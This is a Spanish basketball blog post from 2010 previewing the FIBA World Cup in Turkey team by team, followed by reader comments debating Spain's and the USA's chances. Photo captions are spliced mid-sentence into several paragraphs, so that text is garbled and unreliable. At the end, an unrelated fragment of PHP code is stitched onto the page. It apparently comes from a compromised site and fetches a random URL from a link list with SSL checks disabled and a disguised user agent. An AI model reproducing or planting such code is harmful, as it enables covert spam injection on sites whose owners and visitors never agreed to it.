Volvemos al aire, listos para el MundoBasket

27 de August de 2010 por TheDeerHunter

Iremos recuperando paulatinamente la normalidad en el blog. El sindrome post-vacacional aprieta, pero la actualidad manda. El MundoBasket de Turkía es el aperitivo que nos permitirá resistir un poco mejor el síndrome de abstinencia baloncestístico antes del arranque de la nueva temporada NBA. Analizaremos cómo se presenta la competición, desde el enfoque de los representantes de la liga.

GRUPO A: Grupo flojo, donde destacan Argentina y Serbia por encima de todos. Con Ginobili operativo los Delfino penetrando la defensa Brasileñaalbicelestes deberían haber sido favoritos para el primer puesto. Quizás lo sigan siendo liderados por Scola, Delfino y Oberto. Nocioni no será al final de la partida tras la recomendación de los Sixers de que no fuera a Turkía debido a un esguince de tobillo. El equipo lo completa gente como Quinteros, Prigioni, Pancho Jasen, Juan Gutierrez o Fede Kammerichs, conocidos de  sobra por estos lares. No cabe duda que son duros y experimentados. Pueden dar buenos sustos pero no parece que están en condiciones de disputar el título.

Los serbios fueron una de las gratas sorpresas del Eurobasket y tampoco resultará fácil doblegarles. Poseen talento y juventud para regalar. No podemos decir que el Thunder Nenad Krstic sea el líder de esta selección, aunque sí es pieza clave y por tanto la sanción de 3 partidos impuesta por su tangana les complicará pasar como primeros de grupo. Los Teodosic (suspendido también dos partidos) , Savanovic, Tepic, Perovic, Velickovic tendrán que demostrar que lo de Polonia no fue  flor de un día. No lo van a tener fácil.

Apostamos porque el tercer puesto del grupo será para Australia, a pesar de la decisiva ausencia de Andrew Bogut. El ex-blaugrana y actual Raptor David Andersen y el Blazer Patrick Mills destacan en un equipo rocoso y buen conocedor del juego.

Con la conocida ausencia de Dirk Nowitzki para desgracia de Alemania no hay más jugadores NBA en el grupo, completado por Angola y Jordania. Ninguna de las tres selecciones serán rivales para nadie.

GRUPO B: Debería ocurrir algo muy fuera de lo normal para que la selección estadounidense perdiera algún partido durante la primera fase. Se trata de un conjunto muy mejorable, sin ninguna duda, teniendo presente laMarc tendrá que estar atento a las penetraciones de Durant artilleria que se han dejado en casa. Pero que nadie se llame a engaño. Basado en un núcleo duro de gente nacida en el 88, en el que Kevin Durant destaca sobre todos ellos. No existe ningún otro alero en el campeonato en disposición de pararle individualmente. Le siguen su fiel escudero Westbrook y el siempre resolutivo Derrick Rose. La experiencia la aportará Billups, coronando el indiscutible mejor set de bases de todo el mundial. Podríamos decir que el juego interior es de lo más flojo que presentan, viene encabezado por Kevin Love, un interior que nos encanta. Si acaso la presencia de Chandler y Odom chirría un poco, pero estarán bien arropados por aleros atléticos como Granger, Gay e Iguodala. El físico de este equipo, como siempre, es escandaloso. A bien seguro que tratarán de hacerlo valer. Por último, la plantilla cierran dos buenos jovenes escoltas: Eric Gordon y Stephen Curry. No firman una excelsa  trayectoria como para disfrutar de este honor, pero me da que alguno de estos podría terminar siendo la revelación del  campeonato. Una vez más son los máximos favoritos para llevarse el campeonato. Sólo la Selección Española y ellos mismos podrían evitarlo.

Por Brasil finalmente Nenê no será de la partida. Con él, Tiago Splitter y Anderson Varejao los Carioca hubieran contado con uno de los más potentes juegos interiores del mundial. Por fuera, para lo bueno y lo malo, Leandrinho Barbosa hace y deshace. Le acompañan sumisos Marcelinho Huertas, Alex García o el gran tirador Machado. En definitiva un equipo muy ofensivo y peligroso.

Los eslovenos también lo son, aunque en este caso sólo vienen con Brezec y Goran Dragic como miembros NBA. Nachbar, Lakovic, Samo Udrih, Slokar procurarán que su selección no le ponga las cosas fáciles a nadie.

Por el resto de equipos del grupo sólo veremos (y por poco tiempo) al iraní de los Grizzlies Haddadi. Tanto en Túnez como en Croacia no hay más representantes. Estos últimos, sin embargo, sí cuentan con suficiente talento como para aspirar a estar presentes en la siguiente ronda.

GRUPO C: A priori los turcos deberían hacer valer el apoyo de su público para, como mínimo, pasar a la siguiente Peter John Ramos frente a Yi Yianli en un amistosoronda como primeros. Para ello no cuentan con Okur, pero sí con Turkoglu e Ilyasova, así como los nuevos NBA Ömer Asik y Erden.

Tendrán como rivales a Grecia y Rusia. Entre ambos únicamente un representante ruso en la mejor liga de baloncesto del mundo, el pívot de 7 pies Timofey Mozgov que pertenece el año que viene a los Knicks. El resto son bien conocidos: Kryapa, Monya,  Holden, Spanoulis, Fotsis, Diamantidis… suficiente como para resultar indigestos como siempre han sido ambas selecciones. Los griegos no podrán contar ni con Fotsis ni con Schortsanitis los dos primeros partidos por su tangana contra Serbia.

Puerto Rico llega con Carlos Arroyo, Renaldo Balkman y José Barea, además de Peter John Ramos y Daniel Santiago. Aún así creemos que esto no será suficiente como para poder dar mucha guerra.

China lo hace con la baja de Yao, que es medio equipo. Yi Yianlian, intentará apoyarse en Zhizhi Wang y en “el Magic chino” Sun Yue para evitar ser comparsa.

Costa de Marfil será la cenicienta del grupo y quizás de la competición.

GRUPO D: Las bajas de Pau Gasol y de Jose Manuel Calderón son un hándicap importante para España para serRudy intentando zafarse de la marca de Billups considerados favoritos por delante de los USA. De momento Marc y Rudy siguen siendo los dos representantes NBA que disputarán por España el campeonato y ambos deberán dar un paso adelante. El líder sin embargo será “La Bomba” Navarro recogiendo el testigo de su gran amigo Pau. Los ex y futuribles Ricky Rubio, Fran Vazquez, Sergio Llull, Garbajosa, Raul López y Victor Claver, junto a Felipe Reyes, San Emeterio y Mumbrú siguen siendo garantía para aspirar a todo. Todo lo que no sea una medalla será un fracaso. Nadie dijo que fuera fácil.

Los primeros escollos serán los siempre complicados lituanos comandados por Kleiza y la Francia cargada de NBAs. Sin las sensibles presencias de Toni Parker, Mickael Pietrus y Turiaf, los Diaw, Batum, Ajinca y Mahinmi, junto a interesantes piezas como De Colo, Bokolo o Gelabale deberán intentar hacer olvidar las decepciones en competiciones internacionales de los últimos tiempos.

Tampoco son un rival cómodo los canadienses, con Joel Anthony y el Knick Andy Rautins, como tampoco Nueva Zelanda, que cuentan con Sean Marks en sus filas. Los libaneses sí deben dar menos guerra, aun teniendo al “temible” Jackson Vroman entre ellos.
¿Alguien se acuerda de este hombre?

Es el momento de las apuestas….Hagan juego señores.

Comenta

10 comentarios a esta entrada

  1. diestro dice:
    #1

    Una cosilla que no tiene mucho que ver,

    ¿La pagina http://tjnba.com/ tiene algo que ver con vosotros? lo digo porque tiene el mismo logo aunque me suena que el año pasado no tenia nada que ver y alguna vez entraba por confusión. Lo digo porque si es vuestra seguiré las novedades y si no pues que lo sepamos la gente que normalmente seguimos este blog.

    Gracias y me alegro que volváis a informar aunque lógicamente no del fin de las vacaciones jeje.

    Un saludo

      Citar

  2. Txusma dice:
    #2

    Creo que España sigue siendo la favorita al oro y que en el último partido frente a los USA no se enseñaron todas las cartas. Eso sí, Kevin Durant me da mucho miedito. Creo q Felipe Reyes estuvo un rato “defendiéndolo”, con eso se dice todo. Tal vez Claver sea el único con el físico adecuado para hacerlo mínimamente bien?

      Citar

  3. TheDeerHunter dice:
    #3

    Me parece que a Claver le falta velocidad, experiencia y mala baba para minimizar a Durant.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    Claver le puede poner 3 tapones, y cascarle 2 mates en la cara. Pero no puede defender con garantías a casi nadie y menos a Durant.

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Sí diestro,,si que tiene relación,,pertenece al mismo holding. Áquello es un juego,,y digamos que son los polvos de los que vienen estos lodos.

      Citar

  6. Love Denise dice:
    #6

    Claver frenando a Durant???? al unico Durant al que podrian defender Claver seria a su abuela..
    3 tapones y 2 mates en la cara?? venga, me apunto al carro, Claver MVP del Mundial (ironia off).

    Pronostico: creo que USA ganara en semifinales a España, y por ende el oro.. Segundo quedará algun equipito con suerte y que este unido..Argentina, Grecia o Serbia,

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    Lo siento LoveDenise,,pero las condiciones atléticas de Claver dan para eso. De hecho, en el partido de Madrid le metió un tapón de la hostia. Su problema es que tiene la gasolina desventada.

      Citar

  8. Love Denise dice:
    #8

    Una cosa son las condiciones atleticas y otra cosa es que pueda defenderla medianamente bien.
    Gelabale es un portento fisico y despues es un pufo, bueno, aunque ayer parecia Durant gracias a la blanda defensa española.
    Cuantos jugadores hay fisicamente espectaculares (en su mayoria negros) y despues son unos paquetes…

      Citar

  9. KB #24 dice:
    #9

    Eiii foreros! agradecería mucho una aclaración, si España queda segunda o cuarta de su grupo (D) y USA primera o tercera del suyo (B) no se enfrentarían en semis sino en la final. Estoy en lo cierto?

    Según la web de la FIBA nos los encontraríamos en la final. Creeis entonces que la derrota de ayer no es tan mala notícia, que Scariolo lo hizo a drede o almenos que es otra manera (positiva) de ver las cosas?

    Os dejo aquí el link de los cruces http://turkey2010.fiba.com/pages/eng/fe/10/fwcm/p/system-competition.html

    Seguid así con el blog!

    Un seguidor que os lee a diario

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    Que sí, que sí…o bien, no me he explicado, o no me has entendido.
    Habrá en día en el que el cártel de promesa se el caducará,,y o pasa algo o será uno de tantos que tuvo potencial en su día.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>